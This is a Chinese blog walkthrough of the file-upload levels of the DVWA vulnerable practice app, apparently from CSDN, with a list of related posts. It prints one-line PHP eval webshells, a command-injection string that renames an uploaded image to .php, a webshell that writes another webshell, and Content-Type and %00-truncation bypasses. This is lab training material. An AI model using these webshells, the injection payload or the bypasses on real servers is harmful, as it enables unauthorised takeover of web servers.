DVWA篇_文件上传

已于 2023-05-31 18:37:28 修改
阅读量912 收藏 1
点赞数
文章标签: web安全
于 2023-05-25 23:10:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CQ17743254852/article/details/130876565
版权

目录

准备工作:

Low

Medium 

方法一:更改Content-Type类型

方法二:针对文件后缀过滤可以使用%00截断(适用于5.3.4以下的php版本) 

High

方法一:使用命令执行漏洞将文件类型改为php

方法二: 使用文件包含漏洞

 总结:

准备工作:

1.一句话木马:

<?php @eval($_POST['pass']);?>

2.蚁剑

3.Burp Suite

Low

分析代码可知low级别没有进行任何过滤,我们可以直接上传.php文件

使用蚁剑连接 

Medium 

分析代码可知medium级别对content-type以及文件大小进行了过滤,要求为image/jpeg或image/png,我们可以使用Burp Suite抓包改content-type或使用%00进行文件截断(适用于5.3.4以下的php版本)

方法一:更改Content-Type类型

原类型为application/octet-stream,这里我们改为image/jpeg

成功上传后使用蚁剑连接 

方法二:针对文件后缀过滤可以使用%00截断(适用于5.3.4以下的php版本) 

将filename改为test.php.jpeg,再使用%00截断,并进行URL编码

 

这里的content-type因为是.jpeg文件,所以自动修改为image/jpeg了

 再使用蚁剑连接

High

分析代码可知high级别使用白名单的方式进行文件类型过滤,只能是jpg、jpeg、png类型,我们可以使用windows的copy命令来制作图片木马

上传成功

因为上传的是静态文件, 这个时候我们使用蚁剑是连接不了的。有两种方法,第一种是使用命令执行漏洞将文件类型改为php,第二种是使用文件包含漏洞去执行我们上传的文件,执行后会自动生成一个php文件。

方法一:使用命令执行漏洞将文件类型改为php

输入以下代码

127.0.0.1|move ../../hackable/uploads/shell.png ../../hackable/uploads/shell.php

将图片木马文件类型改为php文件类型,成功后会显示以下结果

这时候我们使用蚁剑进行连接

方法二: 使用文件包含漏洞

此方法需要将一句话改为

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[pass])?>');?>

使木马有写功能 

先把security等级跳到low,然后复制刚刚上传的路径,之后利用文件执行漏洞去执行我们的图片木马文件。

可以看到文件执行成功

来到文件包含文件夹下,生成了shell.php文件

 

 使用蚁剑连接

 总结:

DVWA里的文件上传过滤可以抓包修改content-type,也可以使用%00截断,还使用copy命令制作图片木马,然后使用命令执行或者文件包含漏洞getshell

还可以使用前端JS绕过,.htaccess文件上传,竞争条件文件上传等方法

Catherines7
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
DVWA_Tool.rar
02-13
Web应用程序(DVWA)是一个很容易受到攻击的PHP / MySQL Web应用程序。其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,帮助Web开发人员更好地了解保护Web应用程序的过程,并帮助学生和教师了解受控类中的Web应用程序安全性房间环境。DVWA的目标是通过简单直接的界面练习一些最常见的Web漏洞,具有各种难度。请注意,此软件存在记录和未记录的漏洞。
dvwa_owasp_zap_config
05-25
dvwa_owasp_zap_config
DVWA-master.zip_DVWA_php_漏洞_靶场
09-24
php攻防练习靶场,多种漏洞组合,练习代码审计,避免开发出现漏洞
DVWA靶机通关攻略第五关——文件上传
小飞飞的博客
03-11 870
DVWA靶机文件上传详细教学
DVWA全系列-文件上传
leriger的博客
10-01 229
在渗透测试过程中,能够快速获取服务器权限的一个办法。如果开发者对上传的内容过滤的不严,那么就会存在任意文件上传漏洞,就算不能解析,也能挂个黑页,如果被 fghk 利用的话,会造成很不好的影响。如果上传的文件,还能够解析,或者配合文件包含漏洞,那么就能获取到服务器的权限了。上传的文件对 web 应用程序来说是一个巨大的风险,许多攻击的第一步是上传攻击代码到被攻击的系统上,然后攻击者只需要找到方法来执行代码即可完成攻击。也就是说,文件上传是攻击者需要完成的第一步。
DVWA靶场系列(四)—— File Upload(文件上传
qq_45612828的博客
07-12 5576
DVWA靶场系列(四)—— File Upload(文件上传
DVWA通关攻略之文件上传
勿山几已
05-22 1736
简要介绍文件上传漏洞及其利用
DVWA 之 File Upload(文件上传
RexHa的博客
10-02 2398
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA靶场之文件上传(三个等级)
m0_55854679的博客
05-02 7446
文件上传 文件上传的要点:(1)绕过题目的各种过滤手段成功上传文件并且不被删除; (2)确保文件可以正常运行; (3)确保文件可以执行命令。 一句话木马(简称Webshell) <?php @eval($_POST['cmd']); ?> 基本原理 利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过蚁剑或者中国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['cmd']表示从页面中获
dvwa中的文件上传漏洞
无痕的博客
01-12 6474
dvwa漏洞环境演示文件上传漏洞
DVWA的压缩文件安装包下载
09-30
DVWA 适合与PHPstudy合用 用于建立靶场,网络安全的相关学习
网络渗透测试平台_DVWA_201807
07-04
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
Kali渗透测试之DVWA系列10——File Upload(文件上传)
浅浅的博客
06-14 5339
一、File Upload(文件上传) 1、文件上传原理 File Upload,即文件上传漏洞。通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。简单点说,就是用户直接或者通过各种绕过方式将 webshell 上传到服务器中进而执行利用。 2、文件上传漏洞前提条件...
DVWA文件上传漏洞
weixin_56306210的博客
02-13 3878
DVWA文件上传
5、DVWA——文件上传
qq_55202378的博客
09-11 439
DVWA 文件上传
DVWA--文件上传(初中高)
firecjh的博客
06-10 1216
page=file:///C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\2.png,并验证文件包含漏洞是否利用成功。用bp抓包,在将文件扩展名改成.php,因为后端没有验证,这样就可以成功上传扩展名为.php的木马。进入DVWA平台,选择DVWA Security,将安全级别设置为High。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。一句话木马的话,把木马写入了目标机,直接连接的时候就不用设置。
文件上传DVWA文件上传攻略
wj33333的博客
11-17 184
通过源码分析我们可以看到,他对上传的文件类型进行过滤,只允许image/jpeg和image/png文件上传,否则不成功,但是他没有审核内容,所以我们使用图片木马轻松绕过,配合中国蚁剑拿到权限.我们通过源码可以看到对于文件上传没有做任何过滤,允许所有文件进行上传.所有我们使用一句话木马,配合中国蚁剑就能成功拿到权限.我们要修改图片后缀为php,(因为要和中国蚁连接)放包.但是我们已经将木马图片上传成功,所以尝试使用文件包含。或者上传图片抓包.将一句话木马写到图片后面。上传图片木马成功了.
DVWA —— File Upload 文件上传
YouTheFreedom的博客
05-23 248
文件上传漏洞通常由于网页代码中的文件上传路径变量过滤不严或webserver相关解析漏洞未修复而造成的,如果文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,攻击者可通过 Web 访问的目录上传任意文件,包括网站后门文件(webshell),进而远程控制网站服务器。 攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!
网络安全之密码学技术
最新发布
缘友一世的博客
04-29 1300
在DES算法中,明文按64位进行分组(块),密钥长度也是64位,(事实上只有56位参与DES运算,第8、16、24、32、40、48、56、64位是校验位, 使DES的每个密钥都有奇数个1),分组后的每64位明文组(块)分别与56位密钥进行多轮置换(按位替代/交换),最后生成64位的密文组(块)。RSA密钥是(公钥+模值)、(私钥+模值)成组分发的,单独一个公钥或私钥是没有用处,所以所谓的“密钥”其实是它们两者中的一个。IDEA是作为迭代的分组密码实现的,使用128位的密钥和8个循环。
dvwa文件包含利用文件上传
03-06
DVWA(Damn Vulnerable Web Application)是一个用于学习和测试Web应用程序安全的漏洞测试环境。文件包含(File Inclusion)是一种常见的Web应用程序漏洞,攻击者可以利用该漏洞来读取、执行或包含未经授权的文件。 在DVWA中,文件包含漏洞可以通过文件上传功能进行利用。以下是一般的利用步骤: 1. 打开DVWA:首先,您需要启动DVWA并访问其Web界面。 2. 注册和登录:如果您是第一次使用DVWA,您需要注册一个新用户并登录到系统中。 3. 设置安全级别:DVWA提供了不同的安全级别,您可以选择适合您的安全级别。对于文件包含漏洞的利用,建议将安全级别设置为"low"。 4. 寻找文件上传功能:在DVWAWeb界面中,寻找与文件上传相关的功能或页面。通常,这些功能或页面会要求用户上传文件。 5. 构造恶意文件:准备一个恶意文件,该文件可能包含一些恶意代码或命令,以便在服务器上执行。 6. 上传恶意文件:使用文件上传功能将恶意文件上传到服务器。确保您选择了一个可以执行上传文件的目录。 7. 利用文件包含漏洞:通过构造特定的URL,尝试包含刚刚上传的恶意文件。在URL中,将文件名参数设置为您上传的文件名。 8. 执行恶意代码:如果文件包含漏洞存在,并且服务器对上传的文件进行了执行,那么恶意代码将被执行。 请注意,上述步骤仅用于教育和测试目的。在实际环境中,利用文件包含漏洞是非法的,并且可能导致未经授权的访问和攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值